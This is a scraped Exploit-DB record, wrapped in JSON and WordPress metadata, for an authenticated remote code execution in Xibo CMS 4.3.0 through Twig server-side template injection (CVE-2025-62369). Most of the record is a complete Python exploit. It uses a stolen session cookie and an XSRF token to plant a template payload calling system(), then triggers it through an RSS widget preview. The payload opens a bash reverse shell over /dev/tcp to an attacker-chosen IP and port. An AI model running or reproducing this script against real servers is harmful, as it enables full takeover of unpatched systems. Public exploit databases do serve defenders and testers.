{“lastseen”:”2026-04-29T09:27:57″,”description”:”Exploit Title: Xibo CMS – Authenticated Remote Code Execution via SSTI Date: 2025-11-04 Exploit Author: Cristian Branet Vendor Homepage: https:\/\/xibosignage.com\/ Software Link: https:\/\/github.com\/xibosignage\/xibo-cms\/ Version: 4.3.1 Tested on: Linux…”,”published”:”2026-04-29T00:00:00″,”modified”:”2026-04-29T00:00:00″,”type”:”exploitdb”,”title”:”Xibo CMS 4.3.0 – RCE via SSTI”,”source”:””,”references”:””,”id”:”EDB-ID:52516″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-62369″,”CVE-2025-62639″],”sourceData”:”# Exploit Title: Xibo CMS – Authenticated Remote Code Execution via SSTI\\r\\n# Date: 2025-11-04\\r\\n# Exploit Author: Cristian Branet\\r\\n# Vendor Homepage: https:\/\/xibosignage.com\/\\r\\n# Software Link: https:\/\/github.com\/xibosignage\/xibo-cms\/\\r\\n# Version: \\u003c 4.3.1\\r\\n# Tested on: Linux (Ubuntu 22.04)\\r\\n# CVE : CVE-2025-62639\\r\\n# Article: https:\/\/cristibtz.github.io\/posts\/CVE-2025-62369\/\\r\\n\\r\\nimport requests, argparse, pyfiglet, re, json, time\\r\\n\\r\\nparser = argparse.ArgumentParser(description=\\”This script exploits CVE-2025-62369 in Xibo CMS to get a reverse shell.\\”, formatter_class=argparse.ArgumentDefaultsHelpFormatter)\\r\\nparser.add_argument(\\”-u\\”, \\”–url\\”, required=True, help=\\”Xibo CMS server URL (e.g., http:\/\/localhost)\\”)\\r\\nparser.add_argument(\\”-s\\”, \\”–session-key\\”, required=True, help=\\”Use the PHPSESSID\\”)\\r\\nparser.add_argument(\\”-i\\”, \\”–ip\\”, required=True, help=\\”IP address for reverse shell\\”)\\r\\nparser.add_argument(\\”-p\\”, \\”–port\\”, required=True, help=\\”Port for reverse shell\\”)\\r\\n\\r\\nclass Exploit:\\r\\n \\r\\n def __init__(self, url, session, ip, port):\\r\\n self.url = url\\r\\n self.session = session\\r\\n self.ip = ip\\r\\n self.port = port\\r\\n self.headers = {\\r\\n \\”Cookie\\”: f\\”PHPSESSID={session}\\”,\\r\\n \\”User-Agent\\”: \\”Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/143.0.0.0 Safari\/537.36\\”\\r\\n }\\r\\n\\r\\n def get_xsrf_token(self):\\r\\n\\r\\n try: \\r\\n response = requests.get(f\\”{url}\/statusdashboard\\”, headers=self.headers)\\r\\n except Exception as e:\\r\\n print(f\\”Error connecting to {url}: {e}\\”)\\r\\n exit(1)\\r\\n\\r\\n text = response.text\\r\\n\\r\\n pattern = r’name=\\”token\\” content=\\”([a-f0-9]+)\\”‘\\r\\n \\r\\n try:\\r\\n xsrf_token = re.search(pattern, text).group(1)\\r\\n except Exception as e:\\r\\n print(f\\”Error extracting XSRF token: {e}\\”)\\r\\n exit(1)\\r\\n\\r\\n return xsrf_token\\r\\n\\r\\n def create_module_template(self, xsrf_token):\\r\\n\\r\\n timestamp = int(time.time())\\r\\n\\r\\n headers = {\\r\\n \\”Cookie\\”: f\\”PHPSESSID={session}\\”,\\r\\n \\”User-Agent\\”: \\”Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/143.0.0.0 Safari\/537.36\\”,\\r\\n \\”X-XSRF-TOKEN\\”: f\\”{xsrf_token}\\”,\\r\\n \\”X-Requested-With\\”: \\”XMLHttpRequest\\”\\r\\n }\\r\\n\\r\\n data = {\\r\\n \\”templateId\\”: f\\”exploit_poc_{timestamp}\\”, \\r\\n \\”title\\”: \\”Template for PoC\\”,\\r\\n \\”dataType\\”: \\”article\\”,\\r\\n \\”copyTemplateId\\”: \\”\\”,\\r\\n \\”showIn\\”: \\”layout\\”\\r\\n } \\r\\n\\r\\n try:\\r\\n response = requests.post(f\\”{self.url}\/developer\/template\\”, data=data, headers=headers)\\r\\n except Exception as e:\\r\\n print(f\\”Error creating module template: {e}\\”)\\r\\n exit(1)\\r\\n\\r\\n response_info = json.loads(response.text)\\r\\n\\r\\n template_id = response_info[\\”id\\”]\\r\\n\\r\\n return template_id, timestamp, f\\”exploit_poc_{timestamp}\\”\\r\\n\\r\\n\\r\\n def update_module_template(self, xsrf_token, template_id, name):\\r\\n\\r\\n headers = {\\r\\n \\”Cookie\\”: f\\”PHPSESSID={session}\\”,\\r\\n \\”User-Agent\\”: \\”Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/143.0.0.0 Safari\/537.36\\”,\\r\\n \\”X-XSRF-TOKEN\\”: f\\”{xsrf_token}\\”,\\r\\n \\”X-Requested-With\\”: \\”XMLHttpRequest\\”\\r\\n }\\r\\n\\r\\n data = {\\r\\n \\”templateId\\”:f\\”{name}\\”,\\r\\n \\”title\\”: f\\”Template for PoC – {name}\\”,\\r\\n \\”dataType\\”: \\”article\\”,\\r\\n \\”showIn\\”: \\”layout\\”,\\r\\n \\”enabled\\”: \\”on\\”,\\r\\n \\”developer-template-properties\\”: [],\\r\\n \\”properties\\”: [],\\r\\n \\”twig\\”: ‘\\u003cdiv style=\\”background: red; color: white; font-size: 24px; padding: 20px;\\”\\u003eCommand Execution: {{[\\”‘ + f\\”bash -c ‘bash -i \\u003e\\u0026 \/dev\/tcp\/{ip}\/{port} 0\\u003e\\u00261’\\” + ‘\\”]|filter(\\\\’system\\\\’)}} \\u003cbr\\u003e\\u003c\/div\\u003e’,\\r\\n \\”hbs\\”: \\”\\”,\\r\\n \\”style\\”: \\”\\”,\\r\\n \\”head\\”: \\”\\”,\\r\\n \\”onTemplateRender\\”: \\”\\”,\\r\\n \\”onTemplateVisible\\”: \\”\\”,\\r\\n \\”isInvalidateWidget\\”: \\”on\\”\\r\\n } \\r\\n\\r\\n try:\\r\\n response = requests.put(f\\”{self.url}\/developer\/template\/{template_id}\\”, data=data, headers=headers)\\r\\n except Exception as e:\\r\\n print(f\\”Error updating module template: {e}\\”)\\r\\n exit(1)\\r\\n\\r\\n response_info = json.loads(response.text)\\r\\n\\r\\n return response_info[\\”success\\”]\\r\\n\\r\\n def create_normal_template(self, xsrf_token):\\r\\n\\r\\n timestamp = int(time.time())\\r\\n\\r\\n headers = {\\r\\n \\”Cookie\\”: f\\”PHPSESSID={session}\\”,\\r\\n \\”User-Agent\\”: \\”Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/143.0.0.0 Safari\/537.36\\”,\\r\\n \\”X-XSRF-TOKEN\\”: f\\”{xsrf_token}\\”,\\r\\n \\”X-Requested-With\\”: \\”XMLHttpRequest\\”\\r\\n }\\r\\n\\r\\n data = {\\r\\n \\”folderId\\”: 1,\\r\\n \\”name\\”: f\\”exploit_poc_template_{timestamp}\\”,\\r\\n \\”tags\\”: \\”\\”,\\r\\n \\”tagValueInput\\”: \\”\\”,\\r\\n \\”resolutionId\\”: 1,\\r\\n \\”description\\”: \\”Exploit template\\”\\r\\n } \\r\\n\\r\\n try:\\r\\n response = requests.post(f\\”{self.url}\/template\\”, data=data, headers=headers)\\r\\n except Exception as e:\\r\\n print(f\\”Error creating normal template: {e}\\”)\\r\\n exit(1)\\r\\n\\r\\n response_info = json.loads(response.text)\\r\\n\\r\\n template_id = response_info[\\”id\\”]\\r\\n layout_id = response_info[\\”data\\”][\\”layoutId\\”]\\r\\n region_id = response_info[\\”data\\”][\\”regions\\”][0][\\”regionId\\”]\\r\\n playlist_id = response_info[\\”data\\”][\\”regions\\”][0][\\”regionPlaylist\\”][\\”playlistId\\”]\\r\\n\\r\\n return template_id, layout_id, region_id, playlist_id\\r\\n\\r\\n def add_rss_widget(self, xsrf_token, playlist_id, name):\\r\\n \\r\\n headers = {\\r\\n \\”Cookie\\”: f\\”PHPSESSID={session}\\”,\\r\\n \\”User-Agent\\”: \\”Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/143.0.0.0 Safari\/537.36\\”,\\r\\n \\”X-XSRF-TOKEN\\”: f\\”{xsrf_token}\\”,\\r\\n \\”X-Requested-With\\”: \\”XMLHttpRequest\\”\\r\\n }\\r\\n\\r\\n data = {\\r\\n \\”templateId\\”: f\\”{name}\\”,\\r\\n }\\r\\n\\r\\n try:\\r\\n response = requests.post(f\\”{url}\/playlist\/widget\/rss-ticker\/{str(int(playlist_id) + 1)}\\”, data=data, headers=headers)\\r\\n except Exception as e:\\r\\n print(f\\”Error adding RSS widget: {e}\\”)\\r\\n exit(1)\\r\\n \\r\\n response_info = json.loads(response.text)\\r\\n\\r\\n widget_id = response_info[\\”id\\”]\\r\\n\\r\\n return widget_id\\r\\n\\r\\n def preview_rss_widget(self, xsrf_token, widget_id, playlist_id):\\r\\n \\r\\n headers = {\\r\\n \\”Cookie\\”: f\\”PHPSESSID={session}\\”,\\r\\n \\”User-Agent\\”: \\”Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/143.0.0.0 Safari\/537.36\\”,\\r\\n \\”X-XSRF-TOKEN\\”: f\\”{xsrf_token}\\”,\\r\\n \\”X-Requested-With\\”: \\”XMLHttpRequest\\”\\r\\n }\\r\\n\\r\\n try:\\r\\n response = requests.get(f\\”{url}\/playlist\/widget\/resource\/{str(int(playlist_id) + 1)}\/{widget_id}?preview=1\\u0026isEditor=1\\”, headers=headers)\\r\\n except Exception as e:\\r\\n print(f\\”Error previewing RSS widget: {e}\\”)\\r\\n exit(1)\\r\\n\\r\\n return response.status_code\\r\\n\\r\\nif __name__==\\”__main__\\”:\\r\\n print(\\”\\\\n\\”)\\r\\n print(pyfiglet.figlet_format(\\”CVE-2025-62369 PoC\\”, font=\\”small\\”, width=100))\\r\\n print(\\”Author: Cristian Branet\\”)\\r\\n print(\\”GitHub: github.com\/cristibtz\\”)\\r\\n print(\\”Description: This script exploits CVE-2025-62369 in Xibo CMS to get a reverse shell.\\”)\\r\\n print(\\”\\\\n\\”)\\r\\n\\r\\n args = parser.parse_args()\\r\\n url = args.url\\r\\n session = args.session_key\\r\\n ip = args.ip\\r\\n port = args.port\\r\\n\\r\\n xibo_exploit = Exploit(url, session, ip, port)\\r\\n\\r\\n try:\\r\\n xsrf_token = xibo_exploit.get_xsrf_token()\\r\\n except Exception as e:\\r\\n print(f\\”Error getting XSRF token: {e}\\”)\\r\\n exit(1)\\r\\n \\r\\n print(\\”Retrieved XSRF token: \\”)\\r\\n print(xsrf_token)\\r\\n\\r\\n try:\\r\\n module_template_id, creation_time, name = xibo_exploit.create_module_template(xsrf_token)\\r\\n except Exception as e:\\r\\n print(f\\”Error creating module template: {e}\\”)\\r\\n exit(1)\\r\\n\\r\\n print(f\\”Created module template with id: {module_template_id} with name: {name}\\”)\\r\\n\\r\\n try:\\r\\n update_success = xibo_exploit.update_module_template(xsrf_token, module_template_id, name)\\r\\n except Exception as e:\\r\\n print(f\\”Error updating module template: {e}\\”)\\r\\n exit(1)\\r\\n\\r\\n print(f\\”Updated module template with success: {update_success}\\”)\\r\\n\\r\\n print(\\”Creating normal template…\\”)\\r\\n\\r\\n try:\\r\\n normal_template_id, layout_id, region_id, playlist_id = xibo_exploit.create_normal_template(xsrf_token)\\r\\n except Exception as e:\\r\\n print(f\\”Error creating normal template: {e}\\”)\\r\\n exit(1)\\r\\n \\r\\n print(\\”Created normal template with: \\”)\\r\\n\\r\\n print(f\\”Normal Template ID: {normal_template_id}\\”)\\r\\n print(f\\”Layout ID: {layout_id}\\”)\\r\\n print(f\\”Region ID: {region_id}\\”)\\r\\n print(f\\”Playlist ID: {playlist_id}\\”)\\r\\n\\r\\n print(\\”Adding RSS widget to playlist…\\”)\\r\\n\\r\\n try:\\r\\n widget_id = xibo_exploit.add_rss_widget(xsrf_token, playlist_id, name)\\r\\n except Exception as e:\\r\\n print(f\\”Error adding RSS widget: {e}\\”)\\r\\n exit(1)\\r\\n\\r\\n print(f\\”Added RSS widget with ID: {widget_id}\\”)\\r\\n\\r\\n print(\\”Previewing RSS widget to trigger the exploit…\\”)\\r\\n\\r\\n try:\\r\\n status_code = xibo_exploit.preview_rss_widget(xsrf_token, widget_id, playlist_id)\\r\\n except Exception as e:\\r\\n print(f\\”Error previewing RSS widget: {e}\\”)\\r\\n exit(1)\\r\\n\\r\\n if status_code == 200:\\r\\n print(\\”Exploit triggered successfully! Check your listener for a reverse shell.\\”)\\r\\n else:\\r\\n print(\\”Failed to trigger the exploit.\\”)”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52516″,”cvss”:{“score”:7.2,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:H\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52516″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-29T09:27:57″,”description”:”Exploit Title: Xibo CMS – Authenticated Remote Code Execution via SSTI Date: 2025-11-04 Exploit Author: Cristian Branet Vendor Homepage: https:\/\/xibosignage.com\/ Software Link: https:\/\/github.com\/xibosignage\/xibo-cms\/ Version: 4.3.1…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,39,12,40,15,13,7,11,5],"class_list":["post-50099","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-72","tag-exploit","tag-exploitdb","tag-high","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n